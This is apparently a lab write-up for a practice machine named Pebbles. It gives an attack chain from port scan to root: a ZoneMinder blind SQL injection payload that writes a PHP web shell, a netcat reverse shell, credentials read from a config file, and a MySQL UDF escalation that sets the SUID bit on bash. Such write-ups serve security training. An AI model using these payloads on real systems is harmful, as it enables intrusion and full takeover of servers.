Machine Information
- Machine Name: Pebbles
- Machine Difficulty: easy
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Nmap scan report for 192.168.225.52
Host is up, received user-set (0.016s latency).
Scanned at 2024-10-21 22:41:17 +08 for 111s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIH
TdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Pebbles
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Tomcat
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
There’s a lot of web ports opened. I then look into all the web ports and found some interesting information.
Port 3305
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.107.52:3305/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.107.52:3305/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
zm [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 25ms]
[Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 24ms]
server-status [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 15ms]
:: Progress: [220560/220560] :: Job [1/1] :: 1574 req/sec :: Duration: [0:02:08] :: Errors: 0 ::
After doing some enumeration, I found this zm directory which seems interesting.
After looking around the website, there’s some useful information which is the version and software name. I then googled and manage to found this exploit. Since it is vulnerable to SQL Injection, it is possible to gain useful information in the database of even get a shell with it.
1
2
3
4
5
#Simple blind SQL injection
view=request&request=log&task=query&limit=100;(SELECT(SLEEP(10)))#
# for writing file into `/var/www/html`
view=request&request=log&task=query&limit=100;(SELECT+0x3c3f7068702073797374656d28245f4745545b305d293b3f3e+INTO+DUMPFILE+'/var/www/html/vuln.php')#
I then tried to write a vulnerable php file into the machine via SQL Injection and execute it.
Now that I could execute command, it’s time to get reverse shell.
1
2
3
4
5
6
7
8
nc -nvlp 3305
listening on [any] 3305 ...
connect to [192.168.45.181] from (UNKNOWN) [192.168.107.52] 59350
bash: cannot set terminal process group (1280): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pebbles:/var/www/html$ whoami
whoami
www-data
Now that I have shell, time to privilege escalation.
Privilege Escalation
As usual, I started out with linpeas.sh since it’s a linux machine.
1
2
3
4
5
6
7
8
9
www-data@pebbles:/dev/shm$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 :::8080 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 32 :::21 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::3305 :::*
I noticed that there’s a port that only works locally. I then explore the port 3306 and it is a MySQL port. To gain access to the port, I’ll need to have a credential.
1
2
3
4
5
6
7
8
www-data@pebbles:/tmp$ cat /etc/zm/zm.conf
...
# ZoneMinder database user
ZM_DB_USER=root
# ZoneMinder database password
ZM_DB_PASS=ShinyLucentMarker361
...
After getting the credential, I could just login to mysql.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
www-data@pebbles:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| zm |
+--------------------+
5 rows in set (0.01 sec)
After wondering around this mysql, I did not get anything useful from the database. I then remember there’s this UDF exploitation where I could get root shell if successful. I then check if I have the privilege to do so.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
mysql> select * from mysql.user where user = substring_index(user(), '@', 1) \G ;
*************************** 1. row ***************************
Host: localhost
User: root
Select_priv: Y
Insert_priv: Y
Update_priv: Y
Delete_priv: Y
Create_priv: Y
Drop_priv: Y
Reload_priv: Y
Shutdown_priv: Y
Process_priv: Y
File_priv: Y
Grant_priv: Y
References_priv: Y
Index_priv: Y
Alter_priv: Y
Show_db_priv: Y
Super_priv: Y
Create_tmp_table_priv: Y
Lock_tables_priv: Y
Execute_priv: Y
Repl_slave_priv: Y
Repl_client_priv: Y
Create_view_priv: Y
Show_view_priv: Y
Create_routine_priv: Y
Alter_routine_priv: Y
Create_user_priv: Y
Event_priv: Y
Trigger_priv: Y
Create_tablespace_priv: Y
ssl_type:
ssl_cipher:
x509_issuer:
x509_subject:
max_questions: 0
max_updates: 0
max_connections: 0
max_user_connections: 0
plugin: mysql_native_password
authentication_string: *D11862AF9458F6F9B9C584C4606CFF81BA0DD442
password_expired: N
password_last_changed: 2020-06-22 12:53:18
password_lifetime: NULL
account_locked: N
1 row in set (0.00 sec)
It seems like I have all privilege because I’m logged in as root user. I then try to compile the needed file and upload to the machine since the machine do not have gcc.
1
2
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
After everything is compile, upload the file to the machine and run the code accordingly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql>
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)
mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
Query OK, 1 row affected (0.01 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('whoami');
+---------------------+
| do_system('whoami') |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)
I tried to run whoami to check if I could execute any command but no result. I then just try to execute some malicious command and hope everything goes well.
1
2
3
4
5
6
7
8
9
10
11
12
mysql> select do_system('chmod +s /bin/bash');
+---------------------------------+
| do_system('chmod +s /bin/bash') |
+---------------------------------+
| 0 |
+---------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
www-data@pebbles:/dev/shm$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash
It works, the /bin/bash has added a sticky bit which mean I could use /bin/bash -p to get root shell.
1
2
3
www-data@pebbles:/dev/shm$ /bin/bash -p
bash-4.3# whoami
root
That’s how I get my root user ~
Things I learned from this machine
- Blind SQL Injection to RCE in MySQL
- UDF exploitation (can compile in my own host machine if there’s no gcc in victim machine)
- very important : make sure to use the port that was opened to transfer file
- eg: port 8000 is not open in victim machine so transfer file and nc does not work on that port